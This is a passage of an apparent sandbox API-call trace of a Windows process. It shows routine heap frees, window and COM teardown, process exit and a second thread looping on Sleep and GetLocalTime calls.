HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101398 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2288 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102b38 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102878 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f22c0 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102738 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f46f0 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102778 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31026f8 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4088 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102718 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31026d8 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102658 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102678 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4760 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3be8 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102838 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f51e8 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4728 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102798 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5508 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102818 | out: hHeap=0x30f0000) returned 1 [0134.003] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3178 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102698 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31027f8 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101a48 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31026b8 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102758 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102858 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f31a8 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4b78 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3e48 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3758 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f49a0 | out: hHeap=0x30f0000) returned 1 [0134.004] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31027b8 | out: hHeap=0x30f0000) returned 1 [0134.005] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2700 | out: hHeap=0x30f0000) returned 1 [0134.005] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31070f8 | out: hHeap=0x30f0000) returned 1 [0134.005] HeapFree (in: hHeap=0x3cd0000, dwFlags=0x0, lpMem=0x3cd07d0 | out: hHeap=0x3cd0000) returned 1 [0134.005] GetCursorPos (in: lpPoint=0x28fde4 | out: lpPoint=0x28fde4*(x=518, y=780)) returned 1 [0134.005] GetCapture () returned 0x0 [0134.005] WindowFromPoint (Point=0x206) returned 0x2035c [0134.005] GetWindowThreadProcessId (in: hWnd=0x2035c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf90 [0134.005] DestroyWindow (hWnd=0x50066) returned 0 [0134.005] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f21e8 | out: hHeap=0x30f0000) returned 1 [0134.006] DeleteDC (hdc=0x13010b28) returned 1 [0134.006] IMalloc:Free (This=0x76da66bc, pv=0xe3ec50) [0134.006] IMalloc:Free (This=0x76da66bc, pv=0xe4a2b8) [0134.006] IMalloc:Free (This=0x76da66bc, pv=0xe36f38) [0134.007] IMalloc:Free (This=0x76da66bc, pv=0xe44aa8) [0134.007] IMalloc:Free (This=0x76da66bc, pv=0xe3fd78) [0134.007] IMalloc:Free (This=0x76da66bc, pv=0xe4a2e0) [0134.007] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x28fe24 | out: lplpMessageFilter=0x28fe24*=0x30f2054) returned 0x0 [0134.007] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2050 | out: hHeap=0x30f0000) returned 1 [0134.007] UnhookWindowsHookEx (hhk=0x802cb) returned 1 [0134.007] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f21d0 | out: hHeap=0x30f0000) returned 1 [0134.007] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f21b0 | out: hHeap=0x30f0000) returned 1 [0134.007] GetTickCount () returned 0x1d0f772 [0134.007] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2120 | out: hHeap=0x30f0000) returned 1 [0134.007] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2170 | out: hHeap=0x30f0000) returned 1 [0134.007] SetWindowLongA (hWnd=0x301fa, nIndex=0, dwNewLong=0) returned 51323036 [0134.008] DestroyWindow (hWnd=0x301fa) returned 1 [0134.008] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0134.011] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0134.012] NtdllDefWindowProc_A (hWnd=0x301fa, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0134.012] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2098 | out: hHeap=0x30f0000) returned 1 [0134.012] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2078 | out: hHeap=0x30f0000) returned 1 [0134.012] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2138 | out: hHeap=0x30f0000) returned 1 [0134.012] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102898 | out: hHeap=0x30f0000) returned 1 [0134.013] HeapDestroy (hHeap=0x3cd0000) returned 1 [0134.013] GlobalDeleteAtom (nAtom=0xc164) returned 0x0 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f17e0 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f17b0 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107000 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2b40 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f1810 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f1bc0 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f1f70 | out: hHeap=0x30f0000) returned 1 [0134.014] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3108450 | out: hHeap=0x30f0000) returned 1 [0134.014] VirtualFree (lpAddress=0x3e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.015] IMalloc:Free (This=0x76da66bc, pv=0xe43238) [0134.015] IUnknown:AddRef (This=0x76da66bc) returned 0x1 [0134.015] Sleep (dwMilliseconds=0x0) [0134.073] CoFreeUnusedLibraries () [0134.073] OleUninitialize () [0134.312] FreeLibrary (hLibModule=0x775d0000) returned 1 [0134.312] ReleaseSemaphore (in: hSemaphore=0x11c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0134.313] GetCurrentThreadId () returned 0xf38 [0134.313] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f08e0 | out: hHeap=0x30f0000) returned 1 [0134.313] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f07d0 | out: hHeap=0x30f0000) returned 1 [0134.313] ExitProcess (uExitCode=0x0) [0134.318] FreeLibrary (hLibModule=0x738c0000) returned 1 [0134.569] GetProcAddress (hModule=0x76f40000, lpProcName="UnregisterTraceGuids") returned 0x77ab9286 [0134.879] SysReAllocStringLen (in: pbstr=0x28fc48*=0x0, psz="KERNELBASE.DLL", len=0xe | out: pbstr=0x28fc48*="KERNELBASE.DLL") returned 1 [0134.880] CharLowerBuffW (in: lpsz="KERNELBASE.DLL", cchLength=0xe | out: lpsz="kernelbase.dll") returned 0xe [0134.880] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x77240000 [0134.999] GetProcAddress (hModule=0x77240000, lpProcName="DecodePointer") returned 0x77a99d35 [0135.000] SysReAllocStringLen (in: pbstr=0x28fc44*=0x0, psz="KERNELBASE.DLL", len=0xe | out: pbstr=0x28fc44*="KERNELBASE.DLL") returned 1 [0135.000] CharLowerBuffW (in: lpsz="KERNELBASE.DLL", cchLength=0xe | out: lpsz="kernelbase.dll") returned 0xe [0135.000] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x77240000 [0135.001] GetProcAddress (hModule=0x77240000, lpProcName="DecodePointer") returned 0x77a99d35 [0135.002] GetCurrentThreadId () returned 0xf38 [0135.002] GetCurrentThreadId () returned 0xf38 [0135.002] IUnknown:AddRef (This=0x76da66bc) returned 0x1 [0135.002] HeapDestroy (hHeap=0x30f0000) returned 1 [0135.004] CloseHandle (hObject=0x98) returned 1 [0135.004] CloseHandle (hObject=0x9c) returned 1 [0135.006] HeapFree (in: hHeap=0x2890000, dwFlags=0x0, lpMem=0x2890da8 | out: hHeap=0x2890000) returned 1 [0135.007] VirtualFree (lpAddress=0x28a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.008] HeapDestroy (hHeap=0x2890000) returned 1 [0135.013] FreeLibrary (hLibModule=0x75a80000) returned 1 [0135.013] FreeLibrary (hLibModule=0x76920000) returned 1 [0135.014] FreeLibrary (hLibModule=0x74640000) returned 1 Thread: id = 2 os_tid = 0xf5c [0081.046] GetCurrentThreadId () returned 0xf5c [0081.046] GetTickCount () returned 0x1d0309a [0081.046] Sleep (dwMilliseconds=0x3e8) [0082.546] Sleep (dwMilliseconds=0x3e8) [0084.209] Sleep (dwMilliseconds=0x3e8) [0085.466] Sleep (dwMilliseconds=0x3e8) [0086.835] Sleep (dwMilliseconds=0x3e8) [0089.576] Sleep (dwMilliseconds=0x3e8) [0090.702] Sleep (dwMilliseconds=0x3e8) [0091.787] Sleep (dwMilliseconds=0x3e8) [0092.853] Sleep (dwMilliseconds=0x3e8) [0093.974] Sleep (dwMilliseconds=0x3e8) [0095.041] Sleep (dwMilliseconds=0x3e8) [0096.837] Sleep (dwMilliseconds=0x3e8) [0098.372] Sleep (dwMilliseconds=0x3e8) [0099.987] Sleep (dwMilliseconds=0x3e8) [0101.746] Sleep (dwMilliseconds=0x3e8) [0102.822] Sleep (dwMilliseconds=0x3e8) [0103.960] Sleep (dwMilliseconds=0x3e8) [0104.996] Sleep (dwMilliseconds=0x3e8) [0106.350] Sleep (dwMilliseconds=0x3e8) [0107.579] Sleep (dwMilliseconds=0x3e8) [0108.734] Sleep (dwMilliseconds=0x3e8) [0108.782] Sleep (dwMilliseconds=0x3e8) [0108.874] Sleep (dwMilliseconds=0x3e8) [0108.964] Sleep (dwMilliseconds=0x3e8) [0109.063] Sleep (dwMilliseconds=0x3e8) [0109.151] Sleep (dwMilliseconds=0x3e8) [0109.319] Sleep (dwMilliseconds=0x3e8) [0109.424] Sleep (dwMilliseconds=0x3e8) [0109.503] Sleep (dwMilliseconds=0x3e8) [0109.553] Sleep (dwMilliseconds=0x3e8) [0109.604] Sleep (dwMilliseconds=0x3e8) [0109.658] Sleep (dwMilliseconds=0x3e8) [0109.733] Sleep (dwMilliseconds=0x3e8) [0109.816] Sleep (dwMilliseconds=0x3e8) [0109.879] Sleep (dwMilliseconds=0x3e8) [0109.931] Sleep (dwMilliseconds=0x3e8) [0109.984] Sleep (dwMilliseconds=0x3e8) [0110.035] Sleep (dwMilliseconds=0x3e8) [0110.095] Sleep (dwMilliseconds=0x3e8) [0110.146] Sleep (dwMilliseconds=0x3e8) [0110.197] Sleep (dwMilliseconds=0x3e8) [0110.291] Sleep (dwMilliseconds=0x3e8) [0110.343] Sleep (dwMilliseconds=0x3e8) [0110.394] Sleep (dwMilliseconds=0x3e8) [0110.446] Sleep (dwMilliseconds=0x3e8) [0110.499] Sleep (dwMilliseconds=0x3e8) [0110.550] Sleep (dwMilliseconds=0x3e8) [0110.601] Sleep (dwMilliseconds=0x3e8) [0110.655] Sleep (dwMilliseconds=0x3e8) [0110.706] Sleep (dwMilliseconds=0x3e8) [0110.757] Sleep (dwMilliseconds=0x3e8) [0110.808] Sleep (dwMilliseconds=0x3e8) [0110.860] Sleep (dwMilliseconds=0x3e8) [0110.912] Sleep (dwMilliseconds=0x3e8) [0110.966] Sleep (dwMilliseconds=0x3e8) [0111.020] Sleep (dwMilliseconds=0x3e8) [0111.071] Sleep (dwMilliseconds=0x3e8) [0111.142] Sleep (dwMilliseconds=0x3e8) [0111.194] Sleep (dwMilliseconds=0x3e8) [0111.246] Sleep (dwMilliseconds=0x3e8) [0111.299] Sleep (dwMilliseconds=0x3e8) [0111.464] GetLocalTime (in: lpSystemTime=0x397ff4c | out: lpSystemTime=0x397ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x1e, wMilliseconds=0x1bc)) [0111.570] Sleep (dwMilliseconds=0x3e8) [0111.624] Sleep (dwMilliseconds=0x3e8) [0111.676] Sleep (dwMilliseconds=0x3e8) [0111.733] Sleep (dwMilliseconds=0x3e8) [0111.786] Sleep (dwMilliseconds=0x3e8) [0111.838] Sleep (dwMilliseconds=0x3e8) [0111.892] Sleep (dwMilliseconds=0x3e8) [0111.943] Sleep (dwMilliseconds=0x3e8) [0112.063] Sleep (dwMilliseconds=0x3e8) [0112.183] Sleep (dwMilliseconds=0x3e8) [0112.236] Sleep (dwMilliseconds=0x3e8) [0112.295] Sleep (dwMilliseconds=0x3e8) [0112.347] Sleep (dwMilliseconds=0x3e8) [0112.400] Sleep (dwMilliseconds=0x3e8) [0112.454] Sleep (dwMilliseconds=0x3e8) [0112.507] Sleep (dwMilliseconds=0x3e8) [0112.558] Sleep (dwMilliseconds=0x3e8) [0112.616] Sleep (dwMilliseconds=0x3e8) [0112.737] Sleep (dwMilliseconds=0x3e8) [0112.808] Sleep (dwMilliseconds=0x3e8) [0112.862] Sleep (dwMilliseconds=0x3e8) [0112.918] Sleep (dwMilliseconds=0x3e8) [0112.973] Sleep (dwMilliseconds=0x3e8) [0113.030] Sleep (dwMilliseconds=0x3e8) [0113.083] Sleep (dwMilliseconds=0x3e8) [0113.146] Sleep (dwMilliseconds=0x3e8) [0113.215] Sleep (dwMilliseconds=0x3e8) [0113.278] Sleep (dwMilliseconds=0x3e8) [0113.332] Sleep (dwMilliseconds=0x3e8) [0113.388] Sleep (dwMilliseconds=0x3e8) [0113.443] Sleep (dwMilliseconds=0x3e8) [0113.497] Sleep (dwMilliseconds=0x3e8) [0113.572] Sleep (dwMilliseconds=0x3e8) [0113.635] Sleep (dwMilliseconds=0x3e8) [0113.698] Sleep (dwMilliseconds=0x3e8) [0113.761] Sleep (dwMilliseconds=0x3e8) [0113.824] Sleep (dwMilliseconds=0x3e8) [0113.884] Sleep (dwMilliseconds=0x3e8) [0113.986] Sleep (dwMilliseconds=0x3e8) [0114.111] Sleep (dwMilliseconds=0x3e8) [0114.185] Sleep (dwMilliseconds=0x3e8) [0114.296] Sleep (dwMilliseconds=0x3e8) [0114.389] Sleep (dwMilliseconds=0x3e8) [0114.478] Sleep (dwMilliseconds=0x3e8) [0114.570] Sleep (dwMilliseconds=0x3e8) [0114.656] Sleep (dwMilliseconds=0x3e8) [0114.746] Sleep (dwMilliseconds=0x3e8) [0114.837] Sleep (dwMilliseconds=0x3e8) [0114.921] Sleep (dwMilliseconds=0x3e8) [0115.010] Sleep (dwMilliseconds=0x3e8) [0115.107] Sleep (dwMilliseconds=0x3e8) [0115.196] Sleep (dwMilliseconds=0x3e8) [0115.369] Sleep (dwMilliseconds=0x3e8) [0115.457] Sleep (dwMilliseconds=0x3e8) [0115.540] Sleep (dwMilliseconds=0x3e8) [0115.627] Sleep (dwMilliseconds=0x3e8) [0115.707] Sleep (dwMilliseconds=0x3e8) [0115.792] Sleep (dwMilliseconds=0x3e8) [0115.871] Sleep (dwMilliseconds=0x3e8) [0115.892] Sleep (dwMilliseconds=0x3e8) [0115.983] GetLocalTime (in: lpSystemTime=0x397ff4c | out: lpSystemTime=0x397ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x80)) [0115.983] Sleep (dwMilliseconds=0x3e8) [0116.064] Sleep (dwMilliseconds=0x3e8) [0116.144] Sleep (dwMilliseconds=0x3e8) [0116.233] Sleep (dwMilliseconds=0x3e8) [0116.309] Sleep (dwMilliseconds=0x3e8) [0116.383] Sleep (dwMilliseconds=0x3e8) [0116.448] Sleep (dwMilliseconds=0x3e8) [0116.508] Sleep (dwMilliseconds=0x3e8) [0116.568] Sleep (dwMilliseconds=0x3e8) [0116.627] Sleep (dwMilliseconds=0x3e8) [0116.693] Sleep (dwMilliseconds=0x3e8) [0116.752] Sleep (dwMilliseconds=0x3e8) [0116.810] Sleep (dwMilliseconds=0x3e8) [0116.873] Sleep (dwMilliseconds=0x3e8) [0116.934] Sleep (dwMilliseconds=0x3e8) [0116.992] Sleep (dwMilliseconds=0x3e8) [0117.051] Sleep (dwMilliseconds=0x3e8) [0117.114] Sleep (dwMilliseconds=0x3e8) [0117.173] Sleep (dwMilliseconds=0x3e8) [0117.239] Sleep (dwMilliseconds=0x3e8) [0117.301] Sleep (dwMilliseconds=0x3e8) [0117.360] Sleep (dwMilliseconds=0x3e8) [0117.432] Sleep (dwMilliseconds=0x3e8) [0117.492] Sleep (dwMilliseconds=0x3e8) [0117.553] Sleep (dwMilliseconds=0x3e8) [0117.619] Sleep (dwMilliseconds=0x3e8) [0117.711] Sleep (dwMilliseconds=0x3e8) [0117.788] Sleep (dwMilliseconds=0x3e8) [0117.855] Sleep (dwMilliseconds=0x3e8) [0117.920] Sleep (dwMilliseconds=0x3e8) [0117.979] Sleep (dwMilliseconds=0x3e8) [0118.038] Sleep (dwMilliseconds=0x3e8) [0118.096] Sleep (dwMilliseconds=0x3e8) [0118.154] Sleep (dwMilliseconds=0x3e8) [0118.213] Sleep (dwMilliseconds=0x3e8) [0118.271] Sleep (dwMilliseconds=0x3e8) [0118.334] Sleep (dwMilliseconds=0x3e8) [0118.394] Sleep (dwMilliseconds=0x3e8) [0118.466] Sleep (dwMilliseconds=0x3e8) [0118.593] Sleep (dwMilliseconds=0x3e8) [0118.654] Sleep (dwMilliseconds=0x3e8) [0118.717] Sleep (dwMilliseconds=0x3e8) [0118.778] Sleep (dwMilliseconds=0x3e8) [0118.837] Sleep (dwMilliseconds=0x3e8) [0118.900] Sleep (dwMilliseconds=0x3e8) [0118.959] Sleep (dwMilliseconds=0x3e8) [0119.020] Sleep (dwMilliseconds=0x3e8) [0119.091] Sleep (dwMilliseconds=0x3e8) [0119.151] Sleep (dwMilliseconds=0x3e8) [0119.208] Sleep (dwMilliseconds=0x3e8) [0119.265] Sleep (dwMilliseconds=0x3e8) [0119.326] Sleep (dwMilliseconds=0x3e8) [0119.385] Sleep (dwMilliseconds=0x3e8) [0119.447] Sleep (dwMilliseconds=0x3e8) [0119.541] Sleep (dwMilliseconds=0x3e8) [0119.603] Sleep (dwMilliseconds=0x3e8) [0119.680] Sleep (dwMilliseconds=0x3e8) [0119.784] Sleep (dwMilliseconds=0x3e8) [0119.901] Sleep (dwMilliseconds=0x3e8) [0119.985] Sleep (dwMilliseconds=0x3e8) [0120.051] GetLocalTime (in: lpSystemTime=0x397ff4c | out: lpSystemTime=0x397ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x21, wMilliseconds=0x1b7)) [0120.051] Sleep (dwMilliseconds=0x3e8) [0120.124] Sleep (dwMilliseconds=0x3e8) [0120.192] Sleep (dwMilliseconds=0x3e8) [0120.257] Sleep (dwMilliseconds=0x3e8) [0120.315] Sleep (dwMilliseconds=0x3e8) [0120.378] Sleep (dwMilliseconds=0x3e8) [0120.468] Sleep (dwMilliseconds=0x3e8) [0120.527] Sleep (dwMilliseconds=0x3e8) [0120.588] Sleep (dwMilliseconds=0x3e8) [0120.665] Sleep (dwMilliseconds=0x3e8) [0120.726] Sleep (dwMilliseconds=0x3e8) [0120.784] Sleep (dwMilliseconds=0x3e8) [0120.844] Sleep (dwMilliseconds=0x3e8) [0120.909] Sleep (dwMilliseconds=0x3e8) [0120.995] Sleep (dwMilliseconds=0x3e8) [0121.105] Sleep (dwMilliseconds=0x3e8) [0121.150] Sleep (dwMilliseconds=0x3e8) [0121.197] Sleep (dwMilliseconds=0x3e8) [0121.259] Sleep (dwMilliseconds=0x3e8) [0121.319] Sleep (dwMilliseconds=0x3e8) [0121.385] Sleep (dwMilliseconds=0x3e8) [0121.444] Sleep (dwMilliseconds=0x3e8) [0121.521] Sleep (dwMilliseconds=0x3e8) [0121.603] Sleep (dwMilliseconds=0x3e8) [0121.686] Sleep (dwMilliseconds=0x3e8) [0121.749] Sleep (dwMilliseconds=0x3e8) [0121.807] Sleep (dwMilliseconds=0x3e8) [0121.863] Sleep (dwMilliseconds=0x3e8) [0121.922] Sleep (dwMilliseconds=0x3e8) [0121.981] Sleep (dwMilliseconds=0x3e8) [0122.039] Sleep (dwMilliseconds=0x3e8) [0122.060] Sleep (dwMilliseconds=0x3e8) [0122.073] Sleep (dwMilliseconds=0x3e8) [0122.132] Sleep (dwMilliseconds=0x3e8) [0122.191] Sleep (dwMilliseconds=0x3e8) [0122.249] Sleep (dwMilliseconds=0x3e8) [0122.307] Sleep (dwMilliseconds=0x3e8) [0122.369] Sleep (dwMilliseconds=0x3e8) [0122.431] Sleep (dwMilliseconds=0x3e8) [0122.492] Sleep (dwMilliseconds=0x3e8) [0122.552] Sleep (dwMilliseconds=0x3e8) [0122.610] Sleep (dwMilliseconds=0x3e8) [0122.671] Sleep (dwMilliseconds=0x3e8) [0122.731] Sleep (dwMilliseconds=0x3e8) [0122.801] Sleep (dwMilliseconds=0x3e8) [0122.858] Sleep (dwMilliseconds=0x3e8) [0122.917] Sleep (dwMilliseconds=0x3e8) [0122.978] Sleep (dwMilliseconds=0x3e8) [0123.062] Sleep (dwMilliseconds=0x3e8) [0123.139] Sleep (dwMilliseconds=0x3e8) [0123.219] Sleep (dwMilliseconds=0x3e8) [0123.299] Sleep (dwMilliseconds=0x3e8) [0123.375] Sleep (dwMilliseconds=0x3e8) [0123.446] Sleep (dwMilliseconds=0x3e8) [0123.548] Sleep (dwMilliseconds=0x3e8) [0123.637] Sleep (dwMilliseconds=0x3e8) [0123.733] Sleep (dwMilliseconds=0x3e8) [0123.820] Sleep (dwMilliseconds=0x3e8) [0123.909] Sleep (dwMilliseconds=0x3e8) [0124.009] Sleep (dwMilliseconds=0x3e8) [0124.094] GetLocalTime (in: lpSystemTime=0x397ff4c | out: lpSystemTime=0x397ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x22, wMilliseconds=0x2ed)) [0124.095] Sleep (dwMilliseconds=0x3e8) [0124.183] Sleep (dwMilliseconds=0x3e8) [0124.270] Sleep (dwMilliseconds=0x3e8) [0124.357] Sleep (dwMilliseconds=0x3e8) [0124.447] Sleep (dwMilliseconds=0x3e8) [0124.532] Sleep (dwMilliseconds=0x3e8) [0124.617] Sleep (dwMilliseconds=0x3e8) [0124.700] Sleep (dwMilliseconds=0x3e8) [0124.790] Sleep (dwMilliseconds=0x3e8) [0124.889] Sleep (dwMilliseconds=0x3e8) [0124.971] Sleep (dwMilliseconds=0x3e8) [0125.068] Sleep (dwMilliseconds=0x3e8) [0125.152] Sleep (dwMilliseconds=0x3e8) [0125.228] Sleep (dwMilliseconds=0x3e8) [0125.302] Sleep (dwMilliseconds=0x3e8) [0125.376] Sleep (dwMilliseconds=0x3e8) [0125.453] Sleep (dwMilliseconds=0x3e8) [0125.520] Sleep (dwMilliseconds=0x3e8) [0125.587] Sleep (dwMilliseconds=0x3e8) [0125.654] Sleep (dwMilliseconds=0x3e8) [0125.740] Sleep (dwMilliseconds=0x3e8) [0125.811] Sleep (dwMilliseconds=0x3e8) [0125.876] Sleep (dwMilliseconds=0x3e8) [0125.952] Sleep (dwMilliseconds=0x3e8) [0126.021] Sleep (dwMilliseconds=0x3e8) [0126.101] Sleep (dwMilliseconds=0x3e8) [0126.167] Sleep (dwMilliseconds=0x3e8) [0126.240] Sleep (dwMilliseconds=0x3e8) [0126.306] Sleep (dwMilliseconds=0x3e8) [0126.356] Sleep (dwMilliseconds=0x3e8) [0126.415] Sleep (dwMilliseconds=0x3e8) [0126.467] Sleep (dwMilliseconds=0x3e8) [0126.516] Sleep (dwMilliseconds=0x3e8) [0126.568] Sleep (dwMilliseconds=0x3e8) [0126.617] Sleep (dwMilliseconds=0x3e8) [0126.668] Sleep (dwMilliseconds=0x3e8) [0126.717] Sleep (dwMilliseconds=0x3e8) [0126.766] Sleep (dwMilliseconds=0x3e8) [0126.817] Sleep (dwMilliseconds=0x3e8) [0126.867] Sleep (dwMilliseconds=0x3e8) [0126.924] Sleep (dwMilliseconds=0x3e8) [0126.987] Sleep (dwMilliseconds=0x3e8) [0127.037] Sleep (dwMilliseconds=0x3e8) [0127.087] Sleep (dwMilliseconds=0x3e8) [0127.138] Sleep (dwMilliseconds=0x3e8) [0127.206] Sleep (dwMilliseconds=0x3e8) [0127.256] Sleep (dwMilliseconds=0x3e8) [0127.306] Sleep (dwMilliseconds=0x3e8) [0127.357] Sleep (dwMilliseconds=0x3e8) [0127.406] Sleep (dwMilliseconds=0x3e8) [0127.455] Sleep (dwMilliseconds=0x3e8) [0127.510] Sleep (dwMilliseconds=0x3e8) [0127.559] Sleep (dwMilliseconds=0x3e8) [0127.612] Sleep (dwMilliseconds=0x3e8) [0127.666] Sleep (dwMilliseconds=0x3e8) [0127.721] Sleep (dwMilliseconds=0x3e8) [0127.770] Sleep (dwMilliseconds=0x3e8) [0127.829] Sleep (dwMilliseconds=0x3e8) [0127.874] Sleep (dwMilliseconds=0x3e8) [0127.920] Sleep (dwMilliseconds=0x3e8) [0127.984] GetLocalTime (in: lpSystemTime=0x397ff4c | out: lpSystemTime=0x397ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x24, wMilliseconds=0x1c)) [0127.984] Sleep (dwMilliseconds=0x3e8) [0128.037] Sleep (dwMilliseconds=0x3e8) [0128.094] Sleep (dwMilliseconds=0x3e8) [0128.143] Sleep (dwMilliseconds=0x3e8) [0128.193] Sleep (dwMilliseconds=0x3e8) [0128.242] Sleep (dwMilliseconds=0x3e8) [0128.301] Sleep (dwMilliseconds=0x3e8) [0128.349] Sleep (dwMilliseconds=0x3e8) [0128.412] Sleep (dwMilliseconds=0x3e8) [0128.460] 